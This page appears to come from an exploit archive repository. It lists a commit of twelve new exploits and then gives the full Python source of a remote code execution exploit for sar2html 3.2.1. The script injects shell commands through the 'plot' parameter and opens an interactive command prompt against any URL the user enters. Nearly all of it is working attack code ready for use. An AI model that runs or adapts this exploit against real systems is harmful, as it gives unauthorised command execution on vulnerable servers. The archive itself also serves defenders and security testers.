8e0113decc
12 changes to exploits/shellcodes Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC) MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path Knockpy 4.1.1 - CSV Injection Wordpress Core 5.2.2 - 'post previews' XSS 4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting Mantis Bug Tracker 2.24.3 - 'access' SQL Injection Advanced Comment System 1.0 - 'ACS_path' Path Traversal sar2html 3.2.1 - 'plot' Remote Code Execution CMS Made Simple 2.2.15 - RCE (Authenticated) Subrion CMS 4.2.1 - 'avatar[path]' XSS Click2Magic 1.1.5 - Stored Cross-Site Scripting Arteco Web Client DVR/NVR - 'SessionId' Brute Force
39 lines
No EOL
1 KiB
Python
Executable file
39 lines
No EOL
1 KiB
Python
Executable file
# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
|
|
# Date: 27-12-2020
|
|
# Exploit Author: Musyoka Ian
|
|
# Vendor Homepage:https://github.com/cemtan/sar2html
|
|
# Software Link: https://sourceforge.net/projects/sar2html/
|
|
# Version: 3.2.1
|
|
# Tested on: Ubuntu 18.04.1
|
|
|
|
#!/usr/bin/env python3
|
|
|
|
import requests
|
|
import re
|
|
from cmd import Cmd
|
|
|
|
url = input("Enter The url => ")
|
|
|
|
class Terminal(Cmd):
|
|
prompt = "Command => "
|
|
def default(self, args):
|
|
exploiter(args)
|
|
|
|
def exploiter(cmd):
|
|
global url
|
|
sess = requests.session()
|
|
output = sess.get(f"{url}/index.php?plot=;{cmd}")
|
|
try:
|
|
out = re.findall("<option value=(.*?)>", output.text)
|
|
except:
|
|
print ("Error!!")
|
|
for ouut in out:
|
|
if "There is no defined host..." not in ouut:
|
|
if "null selected" not in ouut:
|
|
if "selected" not in ouut:
|
|
print (ouut)
|
|
print ()
|
|
|
|
if __name__ == ("__main__"):
|
|
terminal = Terminal()
|
|
terminal.cmdloop() |